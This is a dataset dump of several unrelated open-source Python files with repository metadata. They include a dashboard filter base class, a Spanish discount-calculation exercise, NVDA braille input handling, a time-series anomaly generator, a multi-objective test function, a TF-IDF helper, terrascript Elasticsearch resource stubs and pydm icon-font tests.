] | null | null | null | doodledashboard/filters/filter.py | fossabot/Doodle-Dashboard | 147f5074afd594c47553a115358783b3f91043f0 | [
"MIT"
] | null | null | null | from abc import ABC, abstractmethod
| 17.3125 | 35 | 0.66065 | from abc import ABC, abstractmethod
class MessageFilter(ABC):
def __init__(self):
self._successor = None
@abstractmethod
def filter(self, text_entity):
pass
@staticmethod
@abstractmethod
def get_config_factory():
return None
| 75 | 142 | 23 |
e176e8f1cee58c069ecdbb88cf40ac41ba41119d | 709 | py | Python | Taller_Estructuras_de_Control_Secuenciales/Ejercicio_15.py | LeonardoJimenezUbaque/Algoritmos_y_Programacion_C4_G2 | 7bb6fffa7d5d99ac2b5c0a3724f97a84e145bbb7 | [
"MIT"
] | null | null | null | Taller_Estructuras_de_Control_Secuenciales/Ejercicio_15.py | LeonardoJimenezUbaque/Algoritmos_y_Programacion_C4_G2 | 7bb6fffa7d5d99ac2b5c0a3724f97a84e145bbb7 | [
"MIT"
] | null | null | null | Taller_Estructuras_de_Control_Secuenciales/Ejercicio_15.py | LeonardoJimenezUbaque/Algoritmos_y_Programacion_C4_G2 | 7bb6fffa7d5d99ac2b5c0a3724f97a84e145bbb7 | [
"MIT"
] | null | null | null | """
Ejercicio 15
Dados como datos el precio final pagado por un producto y su precio de venta al pรบblico (PVP), se requiere
que calcule y muestre el porcentaje de descuento que le ha sido aplicado.
Entradas
Precio_Final_Pagado --> Float --> P_F
Precio_Venta_Publico --> Float --> P_V_P
Salidas
Porcentaje_Descuento --> Float --> P_D
"""
# Instructions to the user
print("Para conocer el porcentaje de descuento, escriba lo siguiente: ")
# Inputs: final price paid (P_F) and list/retail price (P_V_P), as floats
P_F = float(input("Digite el precio final pagado por el producto: "))
P_V_P = float(input("Digite el precio de venta al pรบblico del producto: "))
# Computation: discount percentage relative to the list price
P_D = ((P_V_P-P_F)/P_V_P)*100
# Output
print(f"El porcentaje de descuento aplicado es de: {P_D}%")
| 32.227273 | 106 | 0.744711 | """
Ejercicio 15
Dados como datos el precio final pagado por un producto y su precio de venta al pรบblico (PVP), se requiere
que calcule y muestre el porcentaje de descuento que le ha sido aplicado.
Entradas
Precio_Final_Pagado --> Float --> P_F
Precio_Venta_Publico --> Float --> P_V_P
Salidas
Porcentaje_Descuento --> Float --> P_D
"""
# Instrucciones al usuario
print("Para conocer el porcentaje de descuento, escriba lo siguiente: ")
# Entradas
P_F = float(input("Digite el precio final pagado por el producto: "))
P_V_P = float(input("Digite el precio de venta al pรบblico del producto: "))
# Caja negra
P_D = ((P_V_P-P_F)/P_V_P)*100
# Salidas
print(f"El porcentaje de descuento aplicado es de: {P_D}%")
| 0 | 0 | 0 |
ffd083841407fefac167ebacd9988307729e3322 | 3,021 | py | Python | source/brailleInput.py | davidhilton936/clone | 0889f95ef2d74f43b2c98f4d45bf09b0c605f1de | [
"bzip2-1.0.6"
] | 1 | 2019-10-26T04:13:35.000Z | 2019-10-26T04:13:35.000Z | source/brailleInput.py | davidhilton936/clone | 0889f95ef2d74f43b2c98f4d45bf09b0c605f1de | [
"bzip2-1.0.6"
] | 1 | 2017-08-08T00:44:17.000Z | 2017-08-08T00:44:17.000Z | source/brailleInput.py | davidhilton936/clone | 0889f95ef2d74f43b2c98f4d45bf09b0c605f1de | [
"bzip2-1.0.6"
] | 1 | 2020-04-30T19:14:00.000Z | 2020-04-30T19:14:00.000Z | #brailleInput.py
#A part of NonVisual Desktop Access (NVDA)
#This file is covered by the GNU General Public License.
#See the file COPYING for more details.
#Copyright (C) 2012-2013 NV Access Limited, Rui Batista
import os.path
import louis
import braille
import config
from logHandler import log
import winUser
import inputCore
"""Framework for handling braille input from the user.
All braille input is represented by a {BrailleInputGesture}.
Normally, all that is required is to create and execute a L{BrailleInputGesture},
as there are built-in gesture bindings for braille input.
"""
#: The singleton BrailleInputHandler instance.
#: @type: L{BrailleInputHandler}
handler = None
class BrailleInputHandler(object):
"""Handles braille input.
"""
def input(self, dots):
"""Handle one cell of braille input.
"""
# liblouis requires us to set the highest bit for proper use of dotsIO.
char = unichr(dots | 0x8000)
text = louis.backTranslate(
[os.path.join(braille.TABLES_DIR, config.conf["braille"]["inputTable"]),
"braille-patterns.cti"],
char, mode=louis.dotsIO)
chars = text[0]
if len(chars) > 0:
self.sendChars(chars)
class BrailleInputGesture(inputCore.InputGesture):
"""Input (dots and/or space bar) from a braille keyboard.
This could either be as part of a braille display or a stand-alone unit.
L{dots} and L{space} should be set appropriately.
"""
#: Bitmask of pressed dots.
#: @type: int
dots = 0
#: Whether the space bar is pressed.
#: @type: bool
space = False
| 28.5 | 86 | 0.709037 | #brailleInput.py
#A part of NonVisual Desktop Access (NVDA)
#This file is covered by the GNU General Public License.
#See the file COPYING for more details.
#Copyright (C) 2012-2013 NV Access Limited, Rui Batista
import os.path
import louis
import braille
import config
from logHandler import log
import winUser
import inputCore
"""Framework for handling braille input from the user.
All braille input is represented by a {BrailleInputGesture}.
Normally, all that is required is to create and execute a L{BrailleInputGesture},
as there are built-in gesture bindings for braille input.
"""
#: The singleton BrailleInputHandler instance.
#: @type: L{BrailleInputHandler}
handler = None
def initialize():
	"""Create the singleton L{BrailleInputHandler} so braille input is processed."""
	global handler
	handler = BrailleInputHandler()
	log.info("Braille input initialized")
def terminate():
	"""Drop the singleton handler, disabling further braille input handling."""
	global handler
	handler = None
class BrailleInputHandler(object):
	"""Handles braille input.
	"""

	def input(self, dots):
		"""Handle one cell of braille input.
		@param dots: bitmask of pressed dots (dot 1 = bit 0 ... dot 8 = bit 7)
		"""
		# liblouis requires us to set the highest bit for proper use of dotsIO.
		char = unichr(dots | 0x8000)
		# Back-translate the dot pattern to text using the configured braille
		# input table (plus the shared dot-pattern definitions).
		text = louis.backTranslate(
			[os.path.join(braille.TABLES_DIR, config.conf["braille"]["inputTable"]),
			"braille-patterns.cti"],
			char, mode=louis.dotsIO)
		chars = text[0]
		if len(chars) > 0:
			self.sendChars(chars)

	def sendChars(self, chars):
		"""Send translated characters to the system as Unicode key events.
		Each character is emitted as a key-down/key-up pair via SendInput.
		"""
		inputs = []
		for ch in chars:
			for direction in (0,winUser.KEYEVENTF_KEYUP):
				input = winUser.Input()
				input.type = winUser.INPUT_KEYBOARD
				input.ii.ki = winUser.KeyBdInput()
				input.ii.ki.wScan = ord(ch)
				# KEYEVENTF_UNICODE injects the character directly, independent
				# of keyboard layout.
				input.ii.ki.dwFlags = winUser.KEYEVENTF_UNICODE|direction
				inputs.append(input)
		winUser.SendInput(inputs)
"""Input (dots and/or space bar) from a braille keyboard.
This could either be as part of a braille display or a stand-alone unit.
L{dots} and L{space} should be set appropriately.
"""
#: Bitmask of pressed dots.
#: @type: int
dots = 0
#: Whether the space bar is pressed.
#: @type: bool
space = False
def _get_identifiers(self):
if self.space and self.dots:
dotsString = "+".join("dot%d" % (i+1) for i in xrange(8) if self.dots & (1 << i))
return ("bk:space+%s" % dotsString,
"bk:space+dots")
elif self.dots or self.space:
return ("bk:dots",)
else:
return ()
def _get_displayName(self):
if not self.dots and not self.space:
return None
# Translators: Reported before braille input in input help mode.
out = [_("braille")]
if self.space and self.dots:
# Translators: Reported when braille space is pressed with dots in input help mode.
out.append(_("space with dot"))
elif self.dots:
# Translators: Reported when braille dots are pressed in input help mode.
out.append(_("dot"))
elif self.space:
# Translators: Reported when braille space is pressed in input help mode.
out.append(_("space"))
if self.dots:
for dot in xrange(8):
if self.dots & (1 << dot):
out.append(str(dot + 1))
return " ".join(out)
| 1,381 | 0 | 118 |
3dcf6942a7a97ee219cc62d3971216e7115616cc | 3,477 | py | Python | gutenTAG/base_oscillations/utils/consolidator.py | HPI-Information-Systems/gutentag | 5638dadf9b1e83699ca317ce9eb4569a6c350064 | [
"MIT"
] | 1 | 2022-03-01T13:29:16.000Z | 2022-03-01T13:29:16.000Z | gutenTAG/base_oscillations/utils/consolidator.py | HPI-Information-Systems/gutentag | 5638dadf9b1e83699ca317ce9eb4569a6c350064 | [
"MIT"
] | null | null | null | gutenTAG/base_oscillations/utils/consolidator.py | HPI-Information-Systems/gutentag | 5638dadf9b1e83699ca317ce9eb4569a6c350064 | [
"MIT"
] | null | null | null | from typing import List, Optional, Tuple
import numpy as np
from gutenTAG.anomalies import AnomalyProtocol, LabelRange, Anomaly
from gutenTAG.base_oscillations.interface import BaseOscillationInterface
| 47.630137 | 155 | 0.67472 | from typing import List, Optional, Tuple
import numpy as np
from gutenTAG.anomalies import AnomalyProtocol, LabelRange, Anomaly
from gutenTAG.base_oscillations.interface import BaseOscillationInterface
class Consolidator:
    """Combines per-channel base oscillations and anomalies into one
    multivariate time series with a binary anomaly label vector."""
    def __init__(self, base_oscillations: List[BaseOscillationInterface], anomalies: List[Anomaly]):
        # One base oscillation per channel; anomalies reference channels by index.
        self.consolidated_channels: List[BaseOscillationInterface] = base_oscillations
        self.anomalies: List[Anomaly] = anomalies
        # (protocol, channel-index) pairs produced by generate_anomalies().
        self.generated_anomalies: List[Tuple[AnomalyProtocol, int]] = []
        self.timeseries: Optional[np.ndarray] = None
        self.labels: Optional[np.ndarray] = None
    def add_channel(self, channel: BaseOscillationInterface):
        """Append another base-oscillation channel."""
        self.consolidated_channels.append(channel)
    def get_channel(self, channel: int) -> BaseOscillationInterface:
        """Return the base oscillation backing channel index `channel`."""
        return self.consolidated_channels[channel]
    def generate(self) -> Tuple[np.ndarray, np.ndarray]:
        """Generate the full series: base channels, anomalies, then variations.

        Returns (timeseries of shape (length, channels), labels of shape
        (length,) with 1 marking anomalous timesteps).
        """
        channels: List[np.ndarray] = []
        for c, bo in enumerate(self.consolidated_channels):
            # Channels can depend on previously generated ones, hence the
            # incremental prev_channels list.
            bo.generate_timeseries_and_variations(c, prev_channels=channels)  # type: ignore # timeseries gets set in generate_timeseries_and_variations()
            if bo.timeseries is not None:
                channels.append(bo.timeseries)
        self.timeseries = self._stack_channels(channels)
        self.labels = np.zeros(self.timeseries.shape[0], dtype=np.int8)
        self.generate_anomalies()
        self.apply_anomalies()
        self.apply_variations()
        return self.timeseries, self.labels
    def apply_variations(self):
        """Add each channel's noise, trend and offset onto the base series."""
        for c, bo in enumerate(self.consolidated_channels):
            self.timeseries[:, c] += bo.noise + bo.trend_series + bo.offset
    def apply_anomalies(self):
        """Splice generated anomaly subsequences into their channels and
        collect the corresponding label ranges."""
        label_ranges: List[LabelRange] = []
        for (protocol, channel) in self.generated_anomalies:
            if len(protocol.subsequences) > 0:
                # Multiple anomalies over the same window are summed.
                subsequence = np.vstack(protocol.subsequences).sum(axis=0)
                self.timeseries[protocol.start:protocol.end, channel] = subsequence
            label_ranges.append(protocol.labels)
        self._add_label_ranges_to_labels(label_ranges)
    def generate_anomalies(self):
        """Let each anomaly pick a (non-overlapping) position on its channel
        and record the resulting protocol."""
        positions: List[Tuple[int, int]] = []
        for anomaly in self.anomalies:
            current_base_oscillation = self.consolidated_channels[anomaly.channel]
            anomaly_protocol = anomaly.generate(current_base_oscillation,
                                                current_base_oscillation.get_timeseries_periods(),
                                                current_base_oscillation.get_base_oscillation_kind(),
                                                positions)
            positions.append((anomaly_protocol.start, anomaly_protocol.end))
            self.generated_anomalies.append((anomaly_protocol, anomaly.channel))
    def _stack_channels(self, channels: List[np.ndarray]) -> np.ndarray:
        """Stack 1-D channel arrays into a (length, channels) matrix."""
        assert all([len(x.shape) == 1 for x in channels]), "The resulting channels have the wrong shape. Correct shape: `(l, d)`."
        return np.vstack(channels).transpose()
    def _add_label_ranges_to_labels(self, label_ranges: List[LabelRange]):
        """Mark every timestep covered by a label range as anomalous (1)."""
        if self.labels is not None:
            for label_range in label_ranges:
                self.labels[label_range.start:label_range.start + label_range.length] = 1
        else:
            raise AssertionError("You cannot run this method before initializing the `labels` field!")
| 3,008 | -2 | 265 |
927514758cfa6089deece09c9319a8bda7feab28 | 1,064 | py | Python | CEGO/testFunctions/DTLZ8.py | napa-jmm/CEGO | 172d511133a608ca5bf265d9ebd2937b8a171b3e | [
"MIT"
] | 6 | 2018-07-18T06:38:42.000Z | 2021-11-17T21:01:40.000Z | CEGO/testFunctions/DTLZ8.py | napa-jmm/CEGO | 172d511133a608ca5bf265d9ebd2937b8a171b3e | [
"MIT"
] | null | null | null | CEGO/testFunctions/DTLZ8.py | napa-jmm/CEGO | 172d511133a608ca5bf265d9ebd2937b8a171b3e | [
"MIT"
] | 6 | 2018-10-15T09:35:24.000Z | 2021-05-08T13:40:19.000Z | # -*- coding: utf-8 -*-
"""
Created on Mon Mar 5 11:06:16 2018
@author: r.dewinter
"""
import numpy as np
#import matplotlib.pyplot as plt
#from mpl_toolkits.mplot3d import Axes3D
#rngMin = np.zeros(9)
#rngMax = np.ones(9)
#nVar = 9
#ref = np.array([1,1,1])
#parameters = np.empty((200,9))
#objectives = np.empty((200,3))
#constraints = np.empty((200,3))
#objectives[:] = 0
#constraints[:] = 0
#parameters[:]= 0
#for i in range(200):
# x = np.random.rand(nVar)*(rngMax-rngMin)+rngMin
# parameters[i] = x
# obj, cons = DTLZ8(x)
# objectives[i] = obj
# constraints[i] = cons
#
#a = np.sum(constraints<0, axis=1)==3
##sum(a)
#fig = plt.figure()
#ax = fig.add_subplot(111,projection='3d')
#ax.scatter(objectives[a][:,0], objectives[a][:,1], objectives[a][:,2])
#fig.show() | 23.644444 | 72 | 0.56391 | # -*- coding: utf-8 -*-
"""
Created on Mon Mar 5 11:06:16 2018
@author: r.dewinter
"""
import numpy as np
def DTLZ8(x):
    """DTLZ8 test problem: 3 objectives and 3 constraints for a 9-variable input.

    Each objective is the mean of one consecutive third of the decision
    vector. Returns (objectives, constraints); constraints are negated so
    that feasible points have every constraint value below zero.
    """
    # Objectives: averages over the three consecutive variable groups.
    thirds = (x[:3], x[3:6], x[6:])
    f1, f2, f3 = (1/3 * np.sum(part) for part in thirds)
    # Original (positive) constraint expressions g1..g3.
    raw_constraints = np.array([
        f3 + 4 * f1 - 1,
        f3 + 4 * f2 - 1,
        2 * f3 + f1 + f2 - 1,
    ])
    return np.array([f1, f2, f3]), -raw_constraints
#import matplotlib.pyplot as plt
#from mpl_toolkits.mplot3d import Axes3D
#rngMin = np.zeros(9)
#rngMax = np.ones(9)
#nVar = 9
#ref = np.array([1,1,1])
#parameters = np.empty((200,9))
#objectives = np.empty((200,3))
#constraints = np.empty((200,3))
#objectives[:] = 0
#constraints[:] = 0
#parameters[:]= 0
#for i in range(200):
# x = np.random.rand(nVar)*(rngMax-rngMin)+rngMin
# parameters[i] = x
# obj, cons = DTLZ8(x)
# objectives[i] = obj
# constraints[i] = cons
#
#a = np.sum(constraints<0, axis=1)==3
##sum(a)
#fig = plt.figure()
#ax = fig.add_subplot(111,projection='3d')
#ax.scatter(objectives[a][:,0], objectives[a][:,1], objectives[a][:,2])
#fig.show() | 217 | 0 | 25 |
583b74e40fc0ea58b61f300685cd5e11e60972b3 | 2,747 | py | Python | vectorize.py | orestislabridis/X-SPELLS | 4285888ef2c9cc5ef59756d363319599d8599e69 | [
"Apache-2.0"
] | 1 | 2021-01-09T09:21:02.000Z | 2021-01-09T09:21:02.000Z | vectorize.py | orestislabridis/X-SPELLS | 4285888ef2c9cc5ef59756d363319599d8599e69 | [
"Apache-2.0"
] | 1 | 2020-11-26T14:34:08.000Z | 2021-02-03T12:48:35.000Z | vectorize.py | orestislampridis/X-SPELLS | 4285888ef2c9cc5ef59756d363319599d8599e69 | [
"Apache-2.0"
] | null | null | null | """
Helper script used for turning text into tf-idf vector for the knn experiment
"""
import re
import numpy
from nltk import pos_tag
from nltk.corpus import stopwords
from nltk.corpus import wordnet
from nltk.stem import SnowballStemmer
from nltk.stem import WordNetLemmatizer
from nltk.tokenize import word_tokenize
from sklearn.feature_extraction.text import TfidfVectorizer
def cleanText(text, lemmatize, stemmer):
"""Method for cleaning text. Removes numbers, punctuation, and capitalization. Stems or lemmatizes text."""
if isinstance(text, float):
text = str(text)
if isinstance(text, numpy.int64):
text = str(text)
try:
text = text.decode()
except AttributeError:
pass
text = re.sub(r"[^A-Za-z]", " ", text)
text = text.lower()
if lemmatize:
wordnet_lemmatizer = WordNetLemmatizer()
text_result = []
tokens = word_tokenize(text) # Generate list of tokens
tagged = pos_tag(tokens)
for t in tagged:
try:
text_result.append(wordnet_lemmatizer.lemmatize(t[0], get_tag(t[1][:2])))
except:
text_result.append(wordnet_lemmatizer.lemmatize(t[0]))
return text_result
if stemmer:
text_result = []
tokens = word_tokenize(text)
snowball_stemmer = SnowballStemmer('english')
for t in tokens:
text_result.append(snowball_stemmer.stem(t))
return text_result
| 32.317647 | 112 | 0.625774 | """
Helper script used for turning text into tf-idf vector for the knn experiment
"""
import re
import numpy
from nltk import pos_tag
from nltk.corpus import stopwords
from nltk.corpus import wordnet
from nltk.stem import SnowballStemmer
from nltk.stem import WordNetLemmatizer
from nltk.tokenize import word_tokenize
from sklearn.feature_extraction.text import TfidfVectorizer
def cleanText(text, lemmatize, stemmer):
    """Method for cleaning text. Removes numbers, punctuation, and capitalization. Stems or lemmatizes text."""
    # Coerce numeric inputs (e.g. from a DataFrame column) into strings.
    if isinstance(text, float):
        text = str(text)
    if isinstance(text, numpy.int64):
        text = str(text)
    # Decode bytes input; str has no .decode(), which raises AttributeError.
    try:
        text = text.decode()
    except AttributeError:
        pass
    # Keep letters only, then normalize case.
    text = re.sub(r"[^A-Za-z]", " ", text)
    text = text.lower()
    if lemmatize:
        wordnet_lemmatizer = WordNetLemmatizer()
        def get_tag(tag):
            # Map a Penn Treebank POS prefix to the wordnet POS constant.
            if tag.startswith('J'):
                return wordnet.ADJ
            elif tag.startswith('V'):
                return wordnet.VERB
            elif tag.startswith('N'):
                return wordnet.NOUN
            elif tag.startswith('R'):
                return wordnet.ADV
            else:
                return ''
        text_result = []
        tokens = word_tokenize(text) # Generate list of tokens
        tagged = pos_tag(tokens)
        for t in tagged:
            # NOTE(review): bare except silently falls back to the default
            # POS when the mapped tag is rejected by the lemmatizer.
            try:
                text_result.append(wordnet_lemmatizer.lemmatize(t[0], get_tag(t[1][:2])))
            except:
                text_result.append(wordnet_lemmatizer.lemmatize(t[0]))
        return text_result
    if stemmer:
        text_result = []
        tokens = word_tokenize(text)
        snowball_stemmer = SnowballStemmer('english')
        for t in tokens:
            text_result.append(snowball_stemmer.stem(t))
        return text_result
def createTFIDF(train, test, remove_stopwords, lemmatize, stemmer):
    """Fit a TF-IDF vectorizer on cleaned `train` texts and transform both
    the training set and the single `test` document.

    Returns (tfidf_train, tfidf_test) as dense numpy arrays; the vectorizer
    vocabulary comes from the training texts only.
    """
    if remove_stopwords:
        vectorizer = TfidfVectorizer(analyzer='word', input='content', stop_words=stopwords.words('english'))
    else:
        vectorizer = TfidfVectorizer(analyzer='word', input='content')
    # Clean every training document and re-join tokens into a string.
    clean_train = []
    for paragraph in train:
        paragraph_result = cleanText(paragraph, lemmatize, stemmer)
        paragraph = " ".join(str(x) for x in paragraph_result)
        clean_train.append(paragraph)
    # `test` is a single document, cleaned the same way.
    paragraph_result = cleanText(test, lemmatize, stemmer)
    paragraph = " ".join(str(x) for x in paragraph_result)
    clean_test = paragraph
    tfidf_train = vectorizer.fit_transform(clean_train).toarray()
    tfidf_test = vectorizer.transform([clean_test]).toarray()
    return tfidf_train, tfidf_test
| 1,151 | 0 | 58 |
1de486ee204679bd8893f40a41b6333021fd84bd | 81 | py | Python | ichnaea/tests/__init__.py | crankycoder/ichnaea | fb54000e92c605843b7a41521e36fd648c11ae94 | [
"Apache-2.0"
] | 1 | 2018-01-18T16:02:43.000Z | 2018-01-18T16:02:43.000Z | ichnaea/tests/__init__.py | crankycoder/ichnaea | fb54000e92c605843b7a41521e36fd648c11ae94 | [
"Apache-2.0"
] | null | null | null | ichnaea/tests/__init__.py | crankycoder/ichnaea | fb54000e92c605843b7a41521e36fd648c11ae94 | [
"Apache-2.0"
] | 1 | 2018-01-19T17:56:48.000Z | 2018-01-19T17:56:48.000Z | import os.path
DATA_DIRECTORY = os.path.join(os.path.dirname(__file__), 'data')
| 20.25 | 64 | 0.753086 | import os.path
DATA_DIRECTORY = os.path.join(os.path.dirname(__file__), 'data')
| 0 | 0 | 0 |
66bacfd2c886a3e584925a335ad2ea71c33c9b69 | 1,524 | py | Python | algo_test3.py | pflun/learningAlgorithms | 3101e989488dfc8a56f1bf256a1c03a837fe7d97 | [
"MIT"
] | null | null | null | algo_test3.py | pflun/learningAlgorithms | 3101e989488dfc8a56f1bf256a1c03a837fe7d97 | [
"MIT"
] | null | null | null | algo_test3.py | pflun/learningAlgorithms | 3101e989488dfc8a56f1bf256a1c03a837fe7d97 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# test = Solution()
# # print test.lexicographical('apple', 'appld')
# print test.trySet()
test = Solution3()
print test.canFinish([[1, 0], [2, 1], [2, 0]]) | 24.190476 | 63 | 0.489501 | # -*- coding: utf-8 -*-
class Solution(object):
    """Scratchpad of small Python 2 experiments (not a real algorithm solution)."""
    # Static (class-level) attribute shared by all instances.
    TAG = "Person"
    def lexicographical(self, a, b):
        """Run several printing experiments, then return the comparison a > b."""
        # Counts down 5, 4, 3, 2, 1, 0 (Python 2 print statement).
        for i in range(5, -1, -1):
            print i
        # NOTE(review): the trailing comma makes `matrix` a 1-tuple that holds the
        # nested list, so matrix[0] is the whole 3x3 list and matrix[1:] is empty
        # (the extend loop below therefore never runs).
        matrix = [
            [1, 5, 9],
            [10, 11, 13],
            [12, 13, 15]
        ],
        res = matrix[0]
        for row in matrix[1:]:
            res.extend(row)
        # NOTE(review): [[...] * 5] * 3 repeats the *same* inner list object, so
        # assigning changeTogether[0][0] changes column 0 of all three rows.
        changeTogether = [[float('-inf')] * 5] * 3
        changeTogether[0][0] = 1
        print changeTogether
        print Solution.TAG
        Solution2().printTwo()
        return a > b
    def isInteger(self, x):
        """Return True only for exact ints (the type() check excludes bool too)."""
        if type(x) == int:
            return True
        else:
            return False
    def trySet(self):
        """Return the distinct values of a sample list (set iteration order)."""
        res = []
        for num in set([1, 2, 2, 5, 5, 5]):
            res.append(num)
        print max([1, 2, 2, 5, 5, 5])
        return res
class Solution2(object):
    """Tiny helper used by Solution.lexicographical to demo cross-class calls."""
    def printTwo(self):
        """Print the string '2' (Python 2 print statement)."""
        print '2'
class Solution3(object):
    """Partial course-schedule experiment: builds a prerequisite adjacency map."""
    def canFinish(self, prerequisites):
        """Build a pre_course -> [courses] map, then print the successors of course 0.

        NOTE(review): despite the name, nothing is returned (implicitly None),
        and `neighboors[0]` raises KeyError when no pair has prerequisite 0.
        """
        neighboors = {}
        # pre_course => [courses]
        for prerequest in prerequisites:
            if prerequest[1] in neighboors:
                neighboors[prerequest[1]].append(prerequest[0])
            else:
                neighboors[prerequest[1]] = [prerequest[0]]
        # Print every course that directly depends on course 0.
        for neighboor in neighboors[0]:
            print neighboor
# test = Solution()
# # print test.lexicographical('apple', 'appld')
# print test.trySet()
test = Solution3()
print test.canFinish([[1, 0], [2, 1], [2, 0]]) | 1,103 | 126 | 120 |
8d4eba3c2060dccdffd308731cd2c7d3744a9820 | 2,751 | py | Python | terrascript/resource/phillbaker/elasticsearch.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 507 | 2017-07-26T02:58:38.000Z | 2022-01-21T12:35:13.000Z | terrascript/resource/phillbaker/elasticsearch.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 135 | 2017-07-20T12:01:59.000Z | 2021-10-04T22:25:40.000Z | terrascript/resource/phillbaker/elasticsearch.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 81 | 2018-02-20T17:55:28.000Z | 2022-01-31T07:08:40.000Z | # terrascript/resource/phillbaker/elasticsearch.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:15:48 UTC)
import terrascript
__all__ = [
"elasticsearch_component_template",
"elasticsearch_composable_index_template",
"elasticsearch_index",
"elasticsearch_index_template",
"elasticsearch_ingest_pipeline",
"elasticsearch_kibana_alert",
"elasticsearch_kibana_object",
"elasticsearch_opendistro_destination",
"elasticsearch_opendistro_ism_policy",
"elasticsearch_opendistro_ism_policy_mapping",
"elasticsearch_opendistro_kibana_tenant",
"elasticsearch_opendistro_monitor",
"elasticsearch_opendistro_role",
"elasticsearch_opendistro_roles_mapping",
"elasticsearch_opendistro_user",
"elasticsearch_snapshot_repository",
"elasticsearch_xpack_index_lifecycle_policy",
"elasticsearch_xpack_license",
"elasticsearch_xpack_role",
"elasticsearch_xpack_role_mapping",
"elasticsearch_xpack_snapshot_lifecycle_policy",
"elasticsearch_xpack_user",
"elasticsearch_xpack_watch",
]
| 22.365854 | 74 | 0.811705 | # terrascript/resource/phillbaker/elasticsearch.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:15:48 UTC)
import terrascript
# One auto-generated placeholder per Terraform "elasticsearch_*" resource type.
# Each subclass inherits all behavior from terrascript.Resource; the class name
# itself is what maps to the Terraform resource name.
class elasticsearch_component_template(terrascript.Resource):
    pass
class elasticsearch_composable_index_template(terrascript.Resource):
    pass
class elasticsearch_index(terrascript.Resource):
    pass
class elasticsearch_index_template(terrascript.Resource):
    pass
class elasticsearch_ingest_pipeline(terrascript.Resource):
    pass
class elasticsearch_kibana_alert(terrascript.Resource):
    pass
class elasticsearch_kibana_object(terrascript.Resource):
    pass
class elasticsearch_opendistro_destination(terrascript.Resource):
    pass
class elasticsearch_opendistro_ism_policy(terrascript.Resource):
    pass
class elasticsearch_opendistro_ism_policy_mapping(terrascript.Resource):
    pass
class elasticsearch_opendistro_kibana_tenant(terrascript.Resource):
    pass
class elasticsearch_opendistro_monitor(terrascript.Resource):
    pass
class elasticsearch_opendistro_role(terrascript.Resource):
    pass
class elasticsearch_opendistro_roles_mapping(terrascript.Resource):
    pass
class elasticsearch_opendistro_user(terrascript.Resource):
    pass
class elasticsearch_snapshot_repository(terrascript.Resource):
    pass
class elasticsearch_xpack_index_lifecycle_policy(terrascript.Resource):
    pass
class elasticsearch_xpack_license(terrascript.Resource):
    pass
class elasticsearch_xpack_role(terrascript.Resource):
    pass
class elasticsearch_xpack_role_mapping(terrascript.Resource):
    pass
class elasticsearch_xpack_snapshot_lifecycle_policy(terrascript.Resource):
    pass
class elasticsearch_xpack_user(terrascript.Resource):
    pass
class elasticsearch_xpack_watch(terrascript.Resource):
    pass
__all__ = [
"elasticsearch_component_template",
"elasticsearch_composable_index_template",
"elasticsearch_index",
"elasticsearch_index_template",
"elasticsearch_ingest_pipeline",
"elasticsearch_kibana_alert",
"elasticsearch_kibana_object",
"elasticsearch_opendistro_destination",
"elasticsearch_opendistro_ism_policy",
"elasticsearch_opendistro_ism_policy_mapping",
"elasticsearch_opendistro_kibana_tenant",
"elasticsearch_opendistro_monitor",
"elasticsearch_opendistro_role",
"elasticsearch_opendistro_roles_mapping",
"elasticsearch_opendistro_user",
"elasticsearch_snapshot_repository",
"elasticsearch_xpack_index_lifecycle_policy",
"elasticsearch_xpack_license",
"elasticsearch_xpack_role",
"elasticsearch_xpack_role_mapping",
"elasticsearch_xpack_snapshot_lifecycle_policy",
"elasticsearch_xpack_user",
"elasticsearch_xpack_watch",
]
| 0 | 1,123 | 529 |
3dbd97084674df281038a2e53d7b34d293b49d15 | 1,579 | py | Python | pydm/tests/utilities/test_iconfont.py | klauer/pydm | e26aad58a7a0eb6f7321c61aa1dace646ff652bd | [
"BSD-3-Clause-LBNL"
] | null | null | null | pydm/tests/utilities/test_iconfont.py | klauer/pydm | e26aad58a7a0eb6f7321c61aa1dace646ff652bd | [
"BSD-3-Clause-LBNL"
] | null | null | null | pydm/tests/utilities/test_iconfont.py | klauer/pydm | e26aad58a7a0eb6f7321c61aa1dace646ff652bd | [
"BSD-3-Clause-LBNL"
] | null | null | null | import pytest
from ...utilities import iconfont
from ...PyQt import QtGui, QtCore
| 30.960784 | 93 | 0.69981 | import pytest
from ...utilities import iconfont
from ...PyQt import QtGui, QtCore
def test_icon_font_constructor(qtbot):
    """IconFont behaves as a singleton: two constructions yield the same object."""
    first = iconfont.IconFont()
    second = iconfont.IconFont()
    assert first is second
def test_icon_font_load_font(qtbot):
    """load_font raises OSError on a bad path and rebuilds char_map on success."""
    fonts = iconfont.IconFont()
    # Invalidate the cached map, then try each argument position with a bad path.
    for bad_args in (('foo', fonts.charmap_file), (fonts.charmap_file, 'foo')):
        with pytest.raises(OSError):
            fonts.char_map = None
            fonts.load_font(*bad_args)
    # A valid font/charmap pair repopulates the character map.
    fonts.load_font(fonts.font_file, fonts.charmap_file)
    assert fonts.char_map is not None
def test_icon_font_get_char_for_name(qtbot):
    """Known glyph names map to their code points; unknown names raise ValueError."""
    fonts = iconfont.IconFont()
    assert fonts.get_char_for_name('cogs') == u'\uf085'
    with pytest.raises(ValueError):
        fonts.get_char_for_name('foo')
def test_icon_font_font(qtbot):
    """font() returns a QFont of the icon family at the requested pixel size."""
    fonts = iconfont.IconFont()
    qfont = fonts.font(12)
    assert qfont.family() == fonts.font_name
    assert qfont.pixelSize() == 12
def test_icon_font_icon(qtbot):
    """icon() accepts known names with or without a color; unknown names raise."""
    fonts = iconfont.IconFont()
    fonts.icon('cogs', color=None)
    fonts.icon('cogs', color=QtGui.QColor(255, 0, 0))
    with pytest.raises(ValueError):
        fonts.icon('foo', color=None)
def test_char_icon_engine(qtbot):
engine = iconfont.CharIconEngine(iconfont.IconFont(), 'cogs', color=None)
pm = engine.pixmap(QtCore.QSize(32, 32), mode=QtGui.QIcon.Normal, state=QtGui.QIcon.On)
